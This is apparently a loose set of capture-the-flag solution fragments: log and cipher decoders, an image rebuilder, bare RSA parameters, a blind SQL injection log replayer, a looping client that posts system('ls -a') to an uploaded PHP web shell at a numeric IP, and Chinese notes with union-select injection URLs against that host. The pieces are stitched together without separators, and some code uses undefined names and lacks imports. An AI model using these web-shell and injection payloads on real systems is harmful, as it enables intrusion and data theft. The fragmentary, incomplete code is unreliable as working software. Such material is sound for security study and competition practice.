# Feed every line of the web server access log to the decoder.
# decode_and_write() and the `file` handle are defined outside this excerpt;
# presumably `file` is the output that decode_and_write() fills -- TODO confirm.
with open('access.log') as f:
    for entry in f:
        decode_and_write(entry)

# Release the handle once the whole log has been processed.
file.close()
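# Forensic replay of a boolean-based blind SQL injection recorded in log.txt.
# Every matching request asks "ORD(MID(<flag>, pos, 1)) > threshold" against
# dvwa.flag_is_here.  The script remembers the last threshold logged for a
# position and, when the position number changes, stores chr(threshold + 1)
# as the character recovered for the previous position.
# Python 2 script: the log is opened in binary mode and matched with str
# patterns.
_PREFIX = (r'AND ORD\(MID\(\(SELECT IFNULL\(CAST\(flag AS CHAR\),0x20\) '
           r'FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1\),')
POSITION_RE = re.compile(_PREFIX + r'(.*?),1\)\)>.*?')
THRESHOLD_RE = re.compile(_PREFIX + r'.*?,1\)\)>(.*?) AND')

i = 1        # 1-based position of the character being recovered
flag = ''    # characters recovered so far
char = ''    # chr(last threshold seen) for position i

with open('log.txt', 'rb') as ff:
    for el in ff:
        num1 = POSITION_RE.findall(el)
        num2 = THRESHOLD_RE.findall(el)
        if not num1 or not num2:
            # Log lines that are not part of this extraction query (normal
            # traffic, other payloads) used to abort the run with IndexError.
            continue

        position, threshold = num1[0], num2[0]
        if position != str(i):
            # The log moved on to another position: commit the previous one.
            flag += chr(ord(char) + 1)
            i = i + 1
        if position == str(i):
            char = chr(int(str(threshold)))

# NOTE(review): when the loop ends, the character for the last position is
# still only held in `char`; nothing in this excerpt appends it to `flag`.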
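# Rebuild a 150x900 RGB image from basic.txt, read as 135000 lines
# (150 * 900), each holding one pixel as comma-separated "R,G,B" integers.
WIDTH, HEIGHT = 150, 900
pic = Image.new("RGB", (WIDTH, HEIGHT))

# The context manager closes the file; the earlier open()/readline() loop
# never did.  The unused `str = ""` assignment is dropped because it shadowed
# the builtin str().
with open("basic.txt", "r") as fo:
    pics = [fo.readline() for _ in range(WIDTH * HEIGHT)]

# Pixels are stored column by column: the first coordinate is the outer loop.
i = 0
for col in range(WIDTH):
    for row in range(HEIGHT):
        s = pics[i].split(',')
        # Coordinates are passed as a tuple, the documented form for putpixel().
        pic.putpixel((col, row), (int(s[0]), int(s[1]), int(s[2])))
        i = i + 1

# NOTE(review): nothing in this excerpt saves or displays `pic`.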
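# Decode text.txt: space-separated tokens, each a one-letter radix tag followed
# by a character code (d = decimal, x = hexadecimal, b = binary, o = octal).
# Tokens with any other first character are ignored.
RADIX_BY_TAG = {'d': 10, 'x': 16, 'b': 2, 'o': 8}

# The context manager closes the handle, which was previously left open.
with open("text.txt", 'r') as file:
    jin = file.read().split(' ')

data = ''.join(
    chr(int(token[1:], RADIX_BY_TAG[token[:1]]))
    for token in jin
    if token[:1] in RADIX_BY_TAG
)

# Parenthesised form prints the same text under Python 2 and Python 3.
print(data)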
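def affine(a, b):
    """Build the decryption table for the affine cipher c = (a*m + b) mod 26.

    Args:
        a: Multiplier of the cipher.
        b: Shift of the cipher.

    Returns:
        dict mapping each lowercase ciphertext letter to its plaintext letter.
        When ``a`` shares a factor with 26 the cipher is not one-to-one: later
        plaintext letters overwrite earlier entries and some ciphertext
        letters get no entry at all.
    """
    return {chr((a * m + b) % 26 + 97): chr(m + 97) for m in range(26)}


def main():
    """Prompt for a ciphertext and the key (a, b), then print the plaintext."""
    pwd = raw_input('str: ')
    # Python 2's input() evaluates whatever is typed as an expression, so the
    # key is read as text and converted; only integers are accepted.
    a = int(raw_input('input a (c = (am + b) mod 26) : '))
    b = int(raw_input('input b (c = (am + b) mod 26) : '))

    pwd_dic = affine(a, b)
    print(pwd_dic)

    # Characters without a table entry (digits, braces, upper case, ...) are
    # copied through unchanged instead of raising KeyError.
    plain = [pwd_dic.get(ch, ch) for ch in pwd]
    print("flag is :" + "".join(plain))


if __name__ == '__main__':
    main()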
N : 460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597 e : 354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619
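# Client for s.php under /uploads/: the POST field named by `passwd` carries a
# PHP statement (system('ls -a');) that the uploaded script presumably
# evaluates -- TODO confirm against s.php itself.
# Defender's view: repeated POSTs to a script inside an upload directory, with
# PHP source in a form field, are a strong web-shell indicator; serving uploads
# from a location where scripts are never executed closes this path.
u = 'http://47.105.148.65:29002/uploads/8af92ffefda7050707590b352dfb3cd2e03d29a6/s.php'
passwd = 's'
com = 'ls -a'
payload = {passwd: "system('" + com + "');"}

s = requests.Session()
while 1:
    try:
        res = s.post(u, payload)
        print("[+] success\n" + res.text + "===")
    except Exception:
        # A bare `except:` also caught KeyboardInterrupt, so this endless
        # loop could not be stopped with Ctrl-C.
        print("failed")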
easy_flask
Search Comments:处存在sql注入
' order by 4# 出现错误,说明该查询只返回 3 列
http://47.105.148.65:29003/?username=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'ctf' and table_name='comment'),3%23
得到id,username,comment
但是只能在第三个字段查询,且' union select 1,2,comment from comment%23会出现和' or 1=1%23一样的Rendering Error.
出现了模板渲染错误,说明查询结果很可能被当作模板内容再次渲染;使用参数化查询,并把查询结果作为数据而不是模板源码输出,可以同时消除这两处问题
直接' union select 1,2,10%23测试报 Mysql Error.错误,应该是花括号原因,不过mysql支持0x开头的16进制,以16进制传入即可